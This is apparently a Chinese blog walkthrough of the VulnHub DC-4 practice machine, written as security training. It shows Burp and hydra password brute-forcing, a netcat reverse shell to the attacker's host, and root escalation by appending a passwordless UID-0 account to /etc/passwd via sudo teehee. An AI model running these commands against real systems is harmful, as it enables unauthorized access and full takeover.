vulnhub DC系列 DC-4

总结:爆破,teehee提权

目录

下载地址

漏洞分析

信息收集

密码爆破

命令执行

​编辑 

ssh爆破

提权


下载地址

使用方法:解压后,使用vm直接打开ova文件。

漏洞分析

信息收集

这里还是使用DC-1的方法

1.给靶机设置一个快照

2.fping -agq 192.168.1.0/24  使用fping快速扫描该网段中存活的机子

3.将靶机关闭重新扫描一下,对比少的那个ip就是靶机的ip

4.使用快照快速将靶机恢复

注:ip段要看自己的

 

这里也是只发现了22端口和80端口,这里看看网站。

 

密码爆破

这里发现有一个登录的网页,这里首先我们尝试尝试一些普通的弱口令,这里没有成功,我们这里使用burp来爆破admin密码。

 这里我们知道了,后台密码是happy

admin:happy

命令执行

这里我们发现里执行了命令,直接通过hackbar,拦截看看有没有操作的空间

 

这里我们发现了,这里参数是设置好了,我们可以任意修改的,但是这里我hackbar好像有点问题,这里就使用burp吧。

这里发现是可以执行的,接下来我们可以尝试反弹shell,这里直接使用nc就可以反弹成功

nc -e /bin/bash 192.168.1.12 4444 //这里ip和端口要看自己

 

ssh爆破

因为在根目录以及当前目录都没有发现什么东西,suid也看看了没有发现什么东西,这里去看看用户目录/home,charles是空,然后jim目录中发现一个字典,这里爆破一下这三个用户。

//生成一个账号文件
echo "chales\njim\nsam" > user.txt

//这里将那个密码文件放到一个新的密码文件中,叫passwd.txt

//接下来爆破ssh密码
hydra -L user.txt -P passwd.txt -v 192.168.1.13 ssh -t 30

 

这里爆破出来了jim用户密码,这里我们ssh登录

jim:jibril04

 这里找了半天不知道那里有提示,这里去找找别人的wp看看,才知道了,是登录是有提示,在这里。

 

 这里来的/var/mail目录中,发现了两个文件,这里看看jim文件,发现了Charles用户的密码

提权

这里我们查看teehee的提权方式。

//teehee提权
echo "raaj::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

//su来到raaj用户
su raaj

 

 

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

练习两年半的篮球选..哦不对安全选手

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值